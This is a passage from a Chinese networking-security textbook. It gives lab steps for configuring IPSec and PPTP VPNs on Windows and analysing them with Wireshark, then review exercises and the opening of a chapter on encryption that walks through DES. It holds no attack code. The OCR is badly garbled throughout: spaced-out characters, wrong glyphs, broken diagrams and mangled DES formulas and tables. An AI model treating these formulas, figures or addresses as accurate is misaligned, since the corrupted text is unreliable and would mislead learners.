(1) 主机 配置 。 根 据 实验 拓扑 图 进行 网 络 环境 配置 ,设置 IP 地 址 、 掩 码 。 

(2) 检查 两 台 主 机 的 连通 性 (用 ping 命令 )。 说 明 连 通 性 结果 的 原因 。 

步骤 2: 在 实验 台中 添加 关于 ICMP 协议 的 安全 策略 。 

该 环节 涉及 几 个 配置 步 又 : 
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(1) 打开 IP 安全 策略 向 导 , 新 建 一 个 IP 策略 。 

(2) 选择 认证 方式 。 

(3) 添加 新 的 IP 规则。 

(4) 添加 IP 安全 规则 ,选择 所 有 ICMP 通信 。 

(5) 配置 身份 验证 方法 。 

步骤 3: 在 本 地 主机 中 添加 ICMP 安全 策略 (类 似 步骤 2) 。 

步骤 4: 连通 性 测试 。 

(1) 在 本 地 主机 上 ,执行 ping 172. 20. 0. 1 -t 命令 ,查看 连接 状态 。 

(2) 在 运行 ping 的 同时 , 右 击 新 建 的 IP 安全 策略 ,选择 “指派 ”, 查 看 ping 程序 的 运行 
(3) 对 两 台 机 器 同时 指派 ,查看 ping 状态 ,两 台 主 机 是 否 可 以 ping 通 ? 说 明 原 因 。 
步骤 5: 启动 协议 分 析 软 件 Wireshark ,查看 双方 加 密 的 交互 过 程 。 

(1) 密 钥 交换 过 程 。 

(2) ICMP 协议 加 密 情况 。 

步骤 6: 对 主机 -主机 的 过 程 进行 总 结 

实验 二 ”网 关 到 网 关 实 验 步 又 。 

步骤 1: 依据 实验 坏 境 , 在 网 关 A 上 进行 网 络 环境 配置 。 

(1) 查看 主机 A 的 IP 地 址 ,并 添加 其 网 络 地 址 172. 20. 1. x。 

(2) 主机 A 本 地 添加 路 由 (或 修改 默认 网 关 为 172. 20. 3. x) : 


route add 172.21.0.0 mask 255.255.0.0 172.20.3.x 
route add 172.22.0.0 mask 255.255.0.0 172.20.3.x 


(3) 主机 A 中 的 实验 台 启 用 LAN 路 由 (“控制 面板 ”>“ 管 理工 具 ”" 一 “路 由 和 远程 
访问 ”)。 

(4) 指定 A 主机 实验 台 的 默认 网 关 为 172. 22. 3. y。 

(5) 查看 并 添加 B 主机 网 络 地 址 172. 21. 1. y。 

(6) 主机 B 本 地 添加 路 由 (或 修改 默认 网 关 为 172. 21. 3. y): 


route add 172.20.0.0 mask 255.255.0.0 172.21.3.y 
route add 172.22.0.0 mask 255.255.0.0 172.21.3.Y 


(7) 主机 B 中 的 实验 台 启 用 LAN 路 由 ( 同 (3))。 

(8) 指定 B 主机 实验 台 的 默认 网 关 为 172. 22. 3. x( 同 (4))。 

步骤 2: 创建 IPSec 策略 。 

(1) 在 A 机 实验 台 上 运行 IPSec 策略 管理 控制 台 ( 在 命令 行 窗口 运行 secpol. msc) , 打 
开 “ 本 地 安全 设置 "窗口 ,进行 IP 安全 策略 设置 。 

(2) 创建 本 实验 台 计 算 机 的 IP 安全 策略 ,例如 ServerA。 

(3) 选中 “编辑 属性 ” 复 选 框 , 单 击 “ 完 成 ”按钮 ,至 此 已 创建 名 为 ServerA 的 IP 安全 策 
略 , 然 后 设置 其 属性 。 

(4) 与 (3) 类 似 , 为 主机 B 实验 台新 建 IPSec 策略 ServerB。 

步 又 3: 主机 A 安全 规则 。 
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(1) 添加 A-B 的 IPSec 筛选 器 列表 。 

(2) 配置 身份 验证 方法 。 

(3) 配置 A-B 筛选 器 规则 。 

IPSec 需要 在 筛选 器 列表 中 指定 的 计算 机 之 间 同 时 有 入 站 和 出 站 筛选 器 。 入 站 筛选 器 
适用 于 传人 的 通信 ,并 允许 接收 端的 计算 机 响应 安全 通信 请 求 ;或 者 按照 IP 筛选 器 列表 匹 
配 通 信 。 出 站 筛选 器 适用 于 传 出 的 通信 ,并 触发 一 个 在 通信 发 送 之 前 进行 的 安全 协商 。 

例如 ,如果 计 算 机 A 要 与 计算 机 B 安全 地 交换 数据 ,计算 机 A 上 的 活动 IPSec 策略 必 
须 有 针对 计算 机 B 的 IPSec 策略 的 筛选 器 。 

(4) 定义 IPSec 筛选 器 操作 。 

(5) 添加 “B-A” 的 IPSec 筛选 器 列表 。 

(6) 配置 身份 验证 方法 。 

(7) 配置 B-A 规则 隧道 终结 点 。 

(8) 定义 IPSec 筛选 器 操作 。 

步骤 4: 主机 的 网 络 配 置 。 

(1) 添加 A-B 的 IPSec 筛选 器 列表 。 

(2) 配置 身份 验证 方法 。 

(3) 配置 A-B 规则 隧道 终结 点 。 

(4) 定义 IPSec 筛选 器 操作 。 

(5) 添加 B-A 的 IPSec 筛选 器 列表 。 

(6) 配置 身份 验证 方法 。 

(7) 配置 B-A 规则 隧道 终结 点 。 

(8) 定义 IPSec 筛选 器 操作 。 

步骤 5: 测试 IPSec 策略 。 

按 要 求 分 别 在 A、B 两 机 配置 好 IPSec 策略 后 , 需 测 试 其 是 否 正常 工作 ,在 测试 前 需 
A、B 两 机 配置 成 路 由 器 ,并 启用 IP 路 由 功能 (选择 "路 由 和 远程 访问 ”” 。 同 时 需 在 A 机 上 
添加 到 B 机 所 在 内 网 段 的 路 由 项 ,在 B 机 上 添加 到 A 机 所 在 内 网 段 的 路 由 项 。 

IPSec 策略 测试 步 又 如 下 : 

(1) 在 IPSec 策略 管理 控制 台 ,设置 “策略 已 指派 ”( 在 A、B 两 机 上 均 需 做 此 操作 ) 。 

(2) 在 A 主机 上 打开 命令 窗口 ,做 ping 操作 ( 即 ping -t 172. 21. X. X)。 该 操作 中 源 
和 目的 IP 地址 匹配 前 面 在 A.B 两 机 上 设置 的 筛选 器 ,其 将 触发 B、A 之 间 的 安全 通信 。 

(3) 在 B 主 机 上 打开 IP 安全 监控 工具 。 

(4) 启用 Wireshark 抓 取 数 据 包 ,分 析 IPSec 的 密 钥 交换 过 程 。 


习 题 7 


1. 阅读 协议 文档 ,了 解 协议 的 详细 信息 。 

(1) RFC2402(AH) 、RFC2403(HMAC-MD5-96) 。 

(2) RFC2404(HMAC-SHA-1-96) 。 

(3) RFC2406 IP 封装 安全 有 效 载荷 (ESP) 。 
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(4) RFC2407 Internet IP 用 于 解释 ISAKMP 的 安全 域 。 

(5) RFC2408 Internet 安全 关联 和 键 管理 协议 (ISAKMP)。 

(6) RFC2409 Internet 密 钥 交换 (IKE) 。 

2. IPSec 协议 族 包含 的 各 个 协议 之 间 有 什么 关系 ? 

3. 说 明 AH 的 传输 模式 和 隧道 模式 ,它们 的 数据 包 格 式 是 什么 样 的 ? 
4. 说 明 ESP 的 传输 模式 和 隧道 模式 ,它们 的 数据 包 格式 是 什么 样 的 ? 
5. IKE 的 作用 是 什么 ? SA 的 作用 是 什么 ? 
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. 选择 题 
1) IPSec 是 ( )VPN 协议 标准 。 
A. 第 一 层 B. 第 二 层 C. 第 三 层 D. 第 四 层 
(2) IPSec 在 任何 通信 开始 之 前 ,要 在 两 个 VPN 节点 或 网 关 之 间 协商 建立 ( ys 
A. IP 地 址 B. 协议 类 型 C. 端口 D. 安全 联盟 
(3) ( ) 是 IPSec 规定 的 一 种 用 来 自动 管理 SA 的 协议 ,包括 建立 协商 ,修改 和 删除 
SA 等 。 
A. IKE B. AH C. ESP D. SSL 
(4) IPSec 不 可 以 做 到 ( ) 
A. 认证 B. 完整 性 检查 C. 加 密 D. 签发 证 书 


(5) 对 远程 访问 型 VPN 来 说 ,( ) 产 品 经 常 与 防火 墙 及 NAT 机 制 存在 兼容 性 问 

题 ,导致 安全 隧道 建立 失败 。 
A. IPSec VPN B. SSL VPN C. MPLS VPN D. L2TP VPN 

7. 在 Windows 操作 系统 中 利用 PPTP( 点 对 点 隧道 协议 ) 配 置 VPN 网 络 。 主 机 A 作 
VPN 服务 端 ,主机 B 作 VPN 客户 端 。 实 验 内 容 和 步骤 如 下 。 

实验 一 : 利用 PPTP 协议 配置 VPN 网 络 。 

步骤 1: 配置 VPN 服务 器 。 

配置 Windows 2003 Server 的 “路 由 和 远程 访问 ”服务 ,选择 “虚拟 专用 网 络 (VPN) 服 务 
器 "项 ,按照 提示 进行 配置 ,并 指定 VPN 客户 端的 IP 地 址 范围 为 本 地 局 域 网 内 地 址 范围 ， 
配置 端口 使 用 VPN 协议 ,选择 并 配置 PPTP 设备 , 写 人 VPN 连接 同时 打开 的 连接 数 为 10， 
为 VPN 服务 器 中 的 系统 用 户 开放 允许 拨 入 的 权限 。 

步骤 2: 配置 VPN 客户 端 。 

新 建 一 个 网 络 连接 ,选择 “连接 到 我 的 工作 场所 的 网 络 ”, 选 择 创建 “虚拟 专用 网 络 连 
接 ”, 输 入 VPN 服务 器 的 IP 地 址 或 者 主机 名 。 打 开 新 建 的 连接 ,输入 用 户 名 和 密码 即 可 发 
起 VPN 的 连接 。 配 置 VPN 客户 端的 连接 属性 ,进一步 配置 VPN 采用 的 加 密 方式 和 身份 
认证 协议 。 

步骤 3: 建立 VPN 连接 。 

在 建立 VPN 连接 之 前 ,客户 端 查看 目前 网 络 连接 的 配置 情况 ,看 出 只 有 一 个 本 地 连接 。 
在 客户 端 连接 界面 中 输入 用 户 名 administrator 和 密码 ,建立 与 VPN 服务 器 的 连接 。 成 功 建立 
VPN 客户 端 和 服务 器 端的 连接 之 后 ,再 查看 VPN 客户 端 网 络 连接 的 配置 情况 时 ,可 以 看 到 新 
增 了 一 个 vpnclient 网 络 连 接 , 并 可 以 看 出 VPN 客户 端 和 服务 端的 连接 端口 。 

同样 可 以 查看 服务 端 建立 VPN 连接 前 后 的 网 络 连 接 状况 变化 。 
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打开 服务 器 端 “ 路 由 和 远程 访问 "窗口 . 单 击 “ 端 口 ”, 可 以 看 到 一 个 WAN 微型 端口 的 状 
态 已 经 成 为 “活动 ”状态 ,查看 端口 状态 ,了 解 VPN 客户 端 和 服务 端 之 间 传 输 的 字 节 数 、 连 
接 时 间 , 客 户 端 的 IP 等 信息 。 

实验 二 : 使 用 Wireshark( 或 Sniffer) 工 具 捕 获 VPN 网 络 中 的 数据 包 。 

步骤 1: 在 未 启动 VPN 连接 之 前 捕获 数据 。 

未 启动 VPN 连接 之 前 ,使 用 抓 包 工具 捕获 客户 端 和 服务 端 之 间 使 用 FTP 协议 的 数据 
包 , 并 使 客户 端 向 服务 端 发 出 FTP 连接 请 求 ,输入 用 户 名 和 密码 ,建立 连接 ,观察 捕获 到 的 
明文 数据 。 

步骤 2: 启动 VPN 连接 之 后 捕获 数据 。 

启动 客户 端 和 服务 端的 VPN 连接 ,再 次 使 用 抓 包 工具 捕获 客户 端 和 服务 端 之 间 使 用 
FTP 协议 的 数据 包 , 并 使 客户 端 向 服务 端 发 出 FTP 连接 请 求 ,输入 用 户 名 和 密码 ,建立 连 
接 , 观 察 捕获 到 的 数据 与 步骤 1 的 差异 。 

实验 要 求 : 

(1) 简单 阐述 实验 原理 。 

(2) 分 别 写 出 建立 VPN 连接 之 前 和 VPN 连接 之 后 客户 端 与 服务 端的 网 络 连接 状况 变化 。 

(3) 分 别 写 出 建立 VPN 连接 之 前 和 VPN 连接 之 后 采用 抓 包工 具 捕获 到 的 客户 端 与 服 
务 端 使 用 FTP 协议 的 数据 包 的 不 同 ,分 析 总 结 原因 。 

8. 在 Windows 操作 系统 中 利用 IPSec 配置 VPN 网 络 。 主 机 A 作为 VPN 服务 端 ,主机 B 
作为 VPN 客户 端 , 两 台 主机 只 要 求 安装 Windows XP 操作 系统 。 实 验 内 容 和 步骤 如 下 。 

实验 一 : 利用 IPSec 协议 配置 VPN 网 络 。 

步骤 1: 配置 Windows 内 置 的 IPSec 安全 策略 。 

(1) 系统 默认 的 情况 下 ,内 置 了 “安全 服务 器 *“ 客 户 端 "“ 服 务 器 ”3 个 安全 选项 。 将 
“安全 服务 器 ”的 “策略 已 指派 ”中 的 选项 变 为 “是 ”, 选 中 “所 有 ICMP 通信 量 ”, 将 这 个 安全 规 
则 设置 为 必须 建立 安全 的 连接 。 

选择 * 预 共享 密 钥 ” 的 方法 作为 “身份 认证 方法 ”, 设 置 共享 密 钥 C。 对 "所 有 IP 通信 量 ” 
做 同样 的 配置 。 

(2) 从 另 一 台 计 算 机 上 用 ping 命令 测试 两 者 之 间 的 连接 ,观察 结果 。 

在 这 台 计 算 机 上 也 做 同样 的 设置 , 密 钥 也 设 为 C, 重 新 用 ping 测试 ,观察 结果 。 

(3) 以 命令 行 方式 输入 命令 ipsecmon. 在 IPSec 的 安全 监视 器 中 查看 相关 的 详细 属性 。 

步骤 2: 配置 专用 的 IPSec 安全 策略 。 

(1) 使 用 “IP 安全 策略 向 导 ? 定 制 专用 的 IPSec 安全 策略 ,并 添加 IP 安全 规则 ,选择 采 
用 预 共享 密 钥 的 方式 进行 身份 认证 ,并 设 定 密 钥 为 C; 在 卫 筛选 器 列表 的 配置 项 中 添加 一 
个 新 的 IP 筛选 器 列表 ,设置 源 地 址 为 “我 的 IP 地 址 ”目标 地 址 为 “任何 IP 地 址 ”; 添 加 好 新 
的 IP 筛选 器 列表 后 ,编辑 这 个 筛选 器 列表 的 操作 ,让 其 进行 IPSec 安全 协商 ,不 和 不 支持 
IPSec 的 计算 机 通信 等 。 

(2) 尝试 用 ping 命令 测试 与 另 一 台 计 算 机 之 间 的 连接 ,观察 结果 ;从 另 一 台 计 算 机 上 
用 ping 命令 测试 两 者 之 间 的 连接 ,观察 结果 。 另 一 台 计 算 机 上 也 做 同样 的 设置 , 密 钥 也 设 
为 C, 重 新 互相 进行 ping 测试 ,观察 结果 。 

(3) 以 命令 行 方式 输入 命令 ipsecmon ,在 IPSec 的 安全 监视 器 中 查看 相关 的 详细 属性 。 
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实验 二 : 使 用 Wireshark 工具 捕获 VPN 网 络 中 的 数据 包 。 

采用 IPSec 隧道 模式 在 两 台 计 算 机 之 间 配 置 VPN ,采用 抓 包 工具 探测 两 台 计 算 机 之 间 
的 数据 包 ,查看 数据 的 机 密 性 。 

实验 要 求 : 

(1) 简单 阐述 实验 原理 。 

(2) 写 出 实验 一 中 不 同 的 ping 测试 连接 的 结果 ,并 分 析 总 结 原因 。 

(3) 写 出 实验 二 的 实验 步 又 和 分 析 结果 。 

(4) 对 应 捕获 的 数据 包 , 分 析 IPSec 建立 连接 和 加 密 的 原理 。 

9. 按 要 求 配置 虚拟 专 网 VPN ,其 拓扑 结构 如 图 7-16 所 示 。 


RI 1010.10224 RR2 


F0/0 192.168.20.1/24 10.10.10.1/24 F0/0 | 192.168.10.1/24 


F0/24 


PC1 PC2 PC3 PC4 
192.168.20.2/24 192.168.20.3/24 192.168.10.2/24 192.168.10.3/24 


图 7-16 题 9 的 拓扑 结构 


(1) 配置 IKE 协商 的 参数 ,指定 认证 所 用 的 算法 是 SHA, 加密 所 用 的 算法 是 3DES,SA 
的 生存 时 间 为 6400 ,配置 预先 共享 的 密 钥 ,此 密码 是 手工 指定 的 。 

(2) 配置 IPSec 的 传输 模式 (模式 名 称 为 kun,AH 验证 为 AH-SHA-HMAC,ESP 加 密 
为 ESP-3DES,ESP 验证 为 ESP-SHA-HMAC) 。 

(3) 进行 数据 加 密 传输 验证 。 

10. 有 实验 拓扑 如 图 7-17 所 示 ,请 按 要 求 完成 实验 。 


200.1.1.1 


Web 服 务 器 


172.16.2.0/24 | | 


[| 10.1.4.0/24 
VLAN2 一 


、VLAN4 


201.1.1.0/30 


202.1.1.0/30 


R1 S2/0 S2/0 R2 
172.16.3.0/24 10.1.5.0/24 
VLAN3 ~ VLANS 


图 7-17 题 10 的 拓扑 结构 
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(1) 按 图 搭建 网 络 ,其 中 PC 为 一 台 外 网 用 机 ,桥接 一 台 路 由 器 再 连接 到 ISP。 

(2) PC 可 以 通过 PPTP 访问 内 网 的 VLAN2, 同 时 可 以 访问 ISP 上 的 Web 服务 器 。 

(3) 要 求 内 网 之 间 建 立 起 IPSec VPN, 以 便 安全 地 通过 ISP 传送 内 网 之 间 的 流量 ,其 中 
VLAN3 到 VLAN4 要 求 采用 3DES 加 密 ,MD5 散 列 ;VLAN3 到 VLAN5 之 间 采 用 AES 加 
密 和 SHA 散 列 ;其 他 流量 采用 DES 加 密 ,MD5 散 列 。 

(4) 确保 内 网 可 以 访问 ISP。 
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第 8 章 数据 加 密 技术 


密码 技术 被 广泛 用 于 网 络 安全 、 操 作 系 统 安全 、 数 据 安全 、 应 用 系统 安全 等 各 种 不 同 的 
应 用 中 。 纵 观 所 有 的 加 密 算法 ,最 具 影 响 力 的 当 属 DES 和 RAS 算法 ,它们 分 别 是 对 称 加 密 
和 公 钥 加 密 的 典型 代表 。 此 外 ,后 起 之 秀 混沌 加 密 也 是 方兴未艾 。 本 章 介 绍 数 据 加 密 的 相 
关 知 识 , 包 括 一 些 常用 加 密 技术 ,如 DES.、RSA ,混沌 加 密 等 ,通过 实例 演示 这 些 加 密 技术 的 
加 /解密 过 程 。 


8.1 数据 加 密 基础 


数据 加 密 是 通过 加 密 算法 和 加 密 密 钥 将 明文 转变 为 密 文 ,而 解密 则 是 通过 解密 算法 和 
解密 密 钥 将 密 文 恢复 为 明文 。 数 据 加 密 目 前 是 计算 机 系统 对 信息 进行 保护 的 一 种 最 可 靠 的 
办 法 。 它 利用 密码 技术 对 信息 进行 加 密 , 实 现 信息 隐蔽 ,防止 数据 未 经 授权 的 泄露 和 未 被 察 
觉 的 修改 , 且 算法 具有 相当 高 的 复杂 性 ,使 得 破译 的 开销 超过 可 能 获得 的 利益 ,从 而 起 到 保 
护 信息 的 安全 的 作用 。 

一 个 数据 加 密 系统 包括 加 密 算法 、 明 文 、 密 文 以 及 密 钥 。 数 据 加 密 系统 的 安全 性 只 在 于 
密 钥 的 保密 性 ,而 不 在 算法 的 保密 性 。 可 靠 的 加 密 算法 ,只 要 破解 者 不 知道 被 加 密 数 据 的 密 
钥 , 也 就 不 可 解读 这 些 数据 。 

明文 用 M( 消 息 ) 或 P( 明 文 ) 表 示 , 它 可 能 是 位 流 ( 文 本 文件 .位 图 、 数 字 化 的 语音 流 或 
数字 化 的 视频 图 像 )。 一 般 PP 指 简单 的 二 进 制 数 据 ,M 指 待 加 密 的 消息 。 

密 文 用 C 表示 , 它 是 二 进 制 数据 。 加 密 函 数 玉 作用 于 M 得 到 密 文 C, 用 数学 表示 为 


E(M)=C 
相反 地 ,解密 函数 D 作用 于 C 产生 M : 
DCC)=M 


先 加 密 后 再 解密 消息 ,原始 的 明文 将 恢复 出 来 , 即 
D(E(M)=M 
除了 提供 机 密 性 外 ,密码 学 通常 有 鉴别 .完整 性 检验 、 抗 抵赖 等 作用 。 鉴 别 是 指 消息 的 
接收 者 应 该 能 够 确认 消息 的 来 源 ,入 侵 者 不 可 能 伪装 他 人 信息 。 完 整 性 检验 是 指 消息 的 接 
收 者 应 该 能 够 验证 在 传送 过 程 中 消息 没有 被 修改 ,入 侵 者 不 可 能 用 假 消息 代替 合法 消息 。 
抗 抵赖 指 发 送 者 事后 不 可 能 虚假 地 否认 他 发 送 的 消息 。 


8.2 加 密 技 术 


密码 算法 是 用 于 加 密 和 解密 的 数学 函数 。 现 代 密码 学 的 加 密 算法 是 公开 的 , 密 钥 主导 

了 加 密 和 解密 进程 。 密 钥 通 常用 K 表示 ,K 可 以 是 很 多 数值 里 的 任意 值 。 密 钥 K 的 可 能 值 

的 范围 叫 作 密 钥 空间 。 加 密 和 解密 运算 都 使 用 这 个 密 钥 ( 即 运 算 都 依赖 于 密 钥 ) ,加 /解密 画 
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数 的 表示 如 下 。 
加 密 算 法 : C=E(Ks, P)。 
解密 算法 : P=DCKb,C) 王 DCKb ,ECKE,P))。 
其 模型 如 图 8-1 所 示 。 


CE(Ke, P) 


P=D(K», O) 


图 8-1 现代 加 密 技 术 模型 


现代 密码 学 有 对 称 加 密 和 非 对 称 加 密 之 分 。 对 称 加 密 方法 是 指 加 密 和 解密 过 程 都 采用 
相同 的 密 钥 , 即 Ke 一 Ko。 非 对 称 加 密 方 法 是 指 加 密 和 解密 过 程 采用 不 同 的 密 钥 , 即 
Ke 天 Kb。 

目前 在 数据 通信 中 使 用 最 普遍 的 算法 有 数据 加 密 标准 DES 算法 .三重 DES 算法 ( 即 
3DES 或 TDES) ,高 级 加 密 标准 AES 算法 、RSA 算法 和 PGP 算法 等 。 


8.3 ”对 称 加 密 技 术 DES 


对 称 加 密 采用 了 对 称 密 码 编码 技术 ,其 特点 是 文件 加 密 和 解密 使 用 相同 的 密 钥 , 即 加 密 
密 钥 也 可 以 用 作 解 密 密 钥 ,这 种 方法 在 密码 学 中 称 为 对 称 加 密 算法 。 对 称 加 密 算法 使 用 简 
单 快捷 , 密 钥 较 短 , 且 破 译 困难 。 除 了 数据 加 密 标准 (DES), 另 一 个 对 称 密 钥 加 密 系 统 是 国 
际 数据 加 密 算法 (IDEA)。IDEA 是 对 称 、 分 组 密码 算法 ,每 组 明文 为 64 位 , 密 钥 为 128 位 ， 
生成 的 密 文 为 64 位 ,与 DES 相 比 加 密 性 更 好 ,易于 实现 。IDEA 加 密 标准 由 PGP(Pretty 
Good Privacy) 系 统 使 用 。 

在 对 称 加密 技 术 中 ,DES 加 密 算法 是 比较 经 典 的 数据 加 密 算法 。DES 是 一 种 对 二 元 数 
据 进 行 加 密 的 算法 ,数据 分 组 长 度 为 64 位 , 密 文 分 组 长 度 也 是 64 位 ,使 用 的 密 钥 为 64 位 ， 
有 效 密 钥 长 度 为 56 位 ,另外 8 位 用 于 奇偶 校 验 。 解 密 时 的 过 程 和 加 密 时 相似 ,但 密 钥 的 顺 
序 正好 相反 。 

DES 算法 的 弱点 是 不 能 提供 足够 的 安全 性 ,因为 其 密 钥 容量 只 有 56 位 , 即 只 有 2” 个 密 
钥 的 可 能 组 合 ,在 1998 年 已 经 被 破译 。 由 于 这 个 原因 ,后 来 又 提出 了 三 重 DES( 或 3DES) 
系统 ,使 用 3 个 不 同 的 密 钥 对 数据 块 进行 ( 两 次 或 )3 次 加 密 ,该 方法 比 进行 普通 加 密 3 次 
快 ,其 强度 大 约 和 112 位 的 密 钥 强度 相当 。 

1. DES 算法 

DES 算法 把 64 位 的 明文 输入 块 变 为 64 位 的 密 文 输出 块 , 它 所 使 用 的 密 钥 也 是 56 位 ， 
其 算法 主要 分 为 两 步 : 

1) 初始 置换 

其 功能 是 把 输入 的 64 位 数据 块 按 位 重新 组 合 ,并 把 输出 分 为 L,、R。 两 部 分 ,每 部 分 各 
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长 32 位 。 其 置换 规则 为 : 将 输入 的 第 58 位 换 到 第 1 位 ,第 50 位 换 到 第 2 位 , 依 此 类 推 ,最 

后 一 位 是 原来 的 第 7 位 。L 、R。 则 是 换 位 输出 后 的 两 部 分 ,L。 是 输出 的 左 32 位 ,R。 是 右 

3 入 

其 置换 规则 如 下 : 

58,50,42,34,26,18,10,2,60,52,44,36,28,20,12,4， 
62,54,46,38,30,22,14,6,64,56,48,40,32,24,16,8， 
57,49,41,33,25,17,9,1,59,51,43,35,27,19,11,3, 
61,53,45,37,29,21,13,5,63,55,47,39,31,23,15,7 


2) 首 置 换 

经 过 16 次 迭代 运算 后 得 到 Lu 、Rys :以 此 作为 输入 进行 逆 置 换 , 逆 置换 正好 是 初始 置换 
的 北 运 算 , 由 此 即 得 到 密 文 输出 。 

DES 的 解密 过 程 是 加 密 过 程 的 逆 操 作 。 

令 i 表示 和 迭代 次 数 , 田 表示 逐 位 模 2 求 和 ,f 为 加 密 函 数 。DES 加 /解密 过 程 表示 如 下 

(1) DES 加 密 过 程 : 

LoR。<-IP( 二 64 位 明文 之 ) 

Li<R,_! i=1 .2 ,16 

RL 1@ f(R, RD) 1 一 1 .2 ,16 

二 64 位 密 文 之 二 IP-! (LieRi) 

(2) DES 解密 过 程 : 

Lis Ri 一 IP( 二 64 位 密 文 之 ) 

有 RD 一 1 .2 ,16 

LeR ® f(R;,k;) 1 一 1 .2 ,16 

一 64 位 明文 之 十 IP-:(CLuR,) 

2. DES 安全 性 分 析 

DES 算法 具有 相当 高 的 复杂 性 ,加 密 函 数 f 的 非 线 性 性 质 非常 好 ,起 到 的 “扰乱 ”效果 
非常 显著 ,并 且 还 遵循 了 严格 雪崩 准则 和 比特 独立 准则 ,这 使 得 密 文 被 破译 的 难度 较 大 。 由 
于 DES 算法 便于 理解 和 掌握 ,经 济 有 效 ,得 到 了 广泛 的 应 用 。 

到 目前 为 止 ,除了 用 穷 举 搜索 法 对 DES 算法 进行 攻击 外 ,还 没有 发 现 更 有 效 的 办 法 (其 
他 方法 有 差分 密码 分 析 、 线 性 密码 分 析 ) ,因此 DES 算法 是 具有 和 较 高 安全 性 的 。 但 是 , 随 着 
计算 机 计算 能 力 的 提高 ,同时 由 于 DES 的 密 钥 过 短 ( 仅 56 位 ), 近 年 对 DES 的 成 功 攻 击 时 
有 报道 。1999 年 已 经 有 组 织 通 过 互联 网 上 的 100 000 台 计 算 机 合作 在 22 小 时 15 分 内 完成 
DES 破解 。 随 着 硬件 技术 和 Internet 的 发 展 ,其 被 破解 所 需要 的 时 间 将 越 来 越 短 。 尽 管 如 
此 ,DES 的 出 现 是 现代 密码 学 历史 上 非常 重要 的 事件 , 它 对 于 分 析 掌 握 分 组 密码 的 基本 理 
论 与 设计 原理 仍然 具有 重要 的 意义 。 

为 了 克服 DES 密 钥 空间 小 的 缺陷 ,人 们 又 提出 了 三 重 DES 的 变形 方式 。3DES 理论 的 
密 钥 长 度 为 56X3==168 位 ,但 是 ,在 受到 中 间 人 攻击 时 将 退化 为 112 位 。 其 安全 性 仍然 不 
理想 。 目 前 代替 DES 的 新 数据 加 密 标 准 称 为 AES。 
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3. DES 算法 实例 

实验 8-1 手工 实现 DES 算法 

【实验 目的 】 

掌握 DES 加 密 算法 的 加 解密 过 程 。 

【实验 原理 】 

DES 算法 把 64 位 的 明文 输入 块 变 为 64 位 的 密 文 输出 块 , 它 所 使 用 的 密 钥 也 是 64 位 。 
其 功能 是 把 输入 的 64 位 数据 块 按 位 重新 组 合 ,并 把 输出 分 为 L,、R。 两 部 分 ,每 部 分 各 长 
32 位 ,然后 进行 前 后 置换 (输入 的 第 58 位 换 到 第 1 位 ,第 50 位 换 到 第 2 位 , 依 此 类 推 , 最 后 
一 位 是 原来 的 第 7 位 ) ,最 终 由 工 , 输出 左 32 位 ,Ru 输出 右 32 位 。 根 据 这 个 法 则 经 过 16 次 
和 迭代 运算 后 ,得 到 Lu Ra ,将 其 作为 输入 ,进行 与 初始 置换 相反 的 逆 置换 , 即 得 到 密 文 。 在 
使 用 DES 时 ,双方 预先 约定 使 用 的 “密码 ”, 即 Key, 然 后 用 Key 去 加 密 数 据 ; 接 收 方 得 到 密 
文 后 使 用 同样 的 Key 解密 得 到 原 数据 。 通 过 定期 在 通信 网 络 的 源 端 和 目的 端 同 时 改 用 新 
的 Key, 便 能 更 进一步 提高 数据 的 保密 性 ,实现 安全 性 较 高 的 数据 传输 。 

【实验 过 程 】 [58 50 42 34 26 18 10 2] 


2 2 

步骤 1: 确定 一 个 初始 置换 规则 。 其 初始 置换 i 
规则 见 图 8-2。 其 置换 也 称 IP(Initial Permutation, 初 6 Hy Me 8 a0 2 4 6 
排 数 据 ) 。 64 56 48 40 32 24 16 8 
图 8-2 看 上 去 杂乱 无 章 ,这 正 是 加 密 所 需 的 ， Ws 4 4 33 25 17 9 1 
被 经 常 应 用 。 其 中 的 数据 表示 二 进 制 明文 的 位 标 ， 59% Sl 43 ‘35 “27 19. 1 3 
为 1 一 64。 例 如 ,58 指 该 组 明文 中 的 第 58 位 ,50 指 6154537 2 21 13 5 
该 组 明文 中 的 第 50 位 ,以 此 类 推 , 最 后 一 位 是 原来 县 


的 第 7 位 。 初 始 排列 的 目的 是 将 明文 的 顺序 打 乱 。 图 82 DES 初始 置换 规则 
例如 ,假设 明文 是 十 六 进 制 的 X 王 0123456789ABCDEF ,将 其 写成 二 进 制 形式 , 共 64 位 ; 
0000 0001 0010 0011 0100 0101 0110 0111 1000 1001 1010 1011 1100 1101 1110 1111 


© 
按 图 8-2 进行 初始 排列 ,数字 串 @ 中 ,第 58 位 是 1, 第 50 位 是 1, 第 42 位 是 0…… 最 后 
其 排列 结果 如 下 : 
1100 1100 0000 0000 1100 1100 1111 1111 1111 0000 1010 1010 1111 0000 1010 1010 
© 
将 @ 写 为 十 六 进 制 是 
CCOOCCFFFOAAFOAA @ 


步 又 2: 乘积 变换 。 
把 步骤 1 得 出 的 64 位 二 进 制 数字 串 一 分 为 二 ,用 L 表示 前 32 位 ,R, 表示 后 32 位 。 
这 样 可 将 @ 写 成 


L, = CCOOCCFF R, = FOAAFOAA @ 
对 @ 进 行 16 次 迭代 运算 ,这 16 次 和 迭代 运算 的 过 程 如 图 8-3 所 示 。 其 中 Ki ~ Kws 为 
16 次 变换 所 采用 的 密 钥 。 每 一 个 密码 函数 FCR ,KK)(G= 1,2,…,16) 都 是 通过 3 个 子 过 
程 (扩展 置换 ,压缩 代 换 ,P 排列 ) 得 到 的 。 由 于 16 次 变换 过 程 是 类 似 的 ,因而 只 须 了 解 其 中 
的 一 个 过 程 ,其 余 的 以 此 类 推 。 
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1 
a | ZL1(32 位 ) 和 R1(32 位 ) 
一 62) Ris(32 位 ) 
1 Kie 
| 和 一 AR Kie) 加 
1 
2 位 ) | 一 RGB2 位 ) 


图 8-3 16 次 迭代 变换 过 程 


在 上 面 的 实例 中 ,不 妨 假设 二 1, 即 第 1 次 变换 。 其 具体 过 程 如 图 8-4 所 示 。 


Zo(32 位 ) | ARG2 位 ) 


1 
扩展 置换 成 48 位 | 子 过 程 1 


中 子 密 钥 Ki(48 位 ) 


压缩 代 换 成 32 位 ”| 子 过 程 2 


ee ee 
ey 排列 PG32 位 ) 子 过 程 3 
ZL(32 位 ) 于 一 RI(32 位 ) 


图 8-4 第 1 次 变换 


(1) 扩展 置换 。 

扩展 置换 又 称 E(Expand) 函数 ,是 一 个 与 密 钥 无 关 的 纯 移 位 变换 , 它 把 32 位 扩展 成 
